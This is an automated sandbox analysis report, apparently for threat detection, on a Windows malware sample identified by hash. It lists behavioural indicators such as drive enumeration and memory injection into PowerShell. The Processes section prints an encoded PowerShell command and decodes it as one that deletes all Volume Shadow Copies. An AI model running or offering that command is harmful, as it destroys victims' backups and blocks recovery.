Analysis
- max time kernel: 121s
- max time network: 147s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 24-01-2022 02:13
Static task: static1
Behavioral task: behavioral1
  Sample: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
  Resource: win10-en-20211208
General
- Target: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
- Size: 168KB
- MD5: 4055b029169ab30c5408bd0ab527a8ae
- SHA1: a410032d78bbc13f8b32ed0f38f6208081518bc6
- SHA256: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac
- SHA512: dfb91472802e5b27c37861e3ebfc88a4b078dd2f123e06bd3541c53631fbded949fb3a3f8953341d8cffcf9ee0d1b02013a7ea2b02a7dd755ab57b91ab87caec
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe (all 24 entries below are from this process)
    description                ioc
    File opened (read-only)    \??\F:
    File opened (read-only)    \??\L:
    File opened (read-only)    \??\S:
    File opened (read-only)    \??\Z:
    File opened (read-only)    \??\E:
    File opened (read-only)    \??\H:
    File opened (read-only)    \??\X:
    File opened (read-only)    \??\V:
    File opened (read-only)    \??\Y:
    File opened (read-only)    \??\I:
    File opened (read-only)    \??\J:
    File opened (read-only)    \??\M:
    File opened (read-only)    \??\Q:
    File opened (read-only)    \??\N:
    File opened (read-only)    \??\O:
    File opened (read-only)    \??\P:
    File opened (read-only)    \??\R:
    File opened (read-only)    \??\A:
    File opened (read-only)    \??\B:
    File opened (read-only)    \??\G:
    File opened (read-only)    \??\K:
    File opened (read-only)    \??\T:
    File opened (read-only)    \??\U:
    File opened (read-only)    \??\W:
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe, powershell.exe
    pid    process
    656    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
    656    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
    960    powershell.exe
    960    powershell.exe
    960    powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, vssvc.exe
    description                 pid     process
    Token: SeDebugPrivilege     960     powershell.exe
    Token: SeBackupPrivilege    2460    vssvc.exe
    Token: SeRestorePrivilege   2460    vssvc.exe
    Token: SeAuditPrivilege     2460    vssvc.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: 3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
    description                    pid    process                                                                    target process
    PID 656 wrote to memory of 960 656    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe    powershell.exe
    PID 656 wrote to memory of 960 656    3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe    powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3ec98567ef4b4e067596f1f696f987164dd2422c6ef6e0084e89f0906596abac.exe"
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child process)
    Command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of Volume Shadow Copies, which accounts for the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege token use recorded above)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/960-121-0x0000025ADCA10000-0x0000025ADCA32000-memory.dmp (Filesize: 136KB)
- memory/960-126-0x0000025ADECD0000-0x0000025ADED46000-memory.dmp (Filesize: 472KB)
- memory/960-133-0x0000025AC4930000-0x0000025ADCA80000-memory.dmp (Filesize: 385.3MB)
- memory/960-136-0x0000025AC4930000-0x0000025ADCA80000-memory.dmp (Filesize: 385.3MB)
- memory/960-140-0x0000025AC4930000-0x0000025ADCA80000-memory.dmp (Filesize: 385.3MB)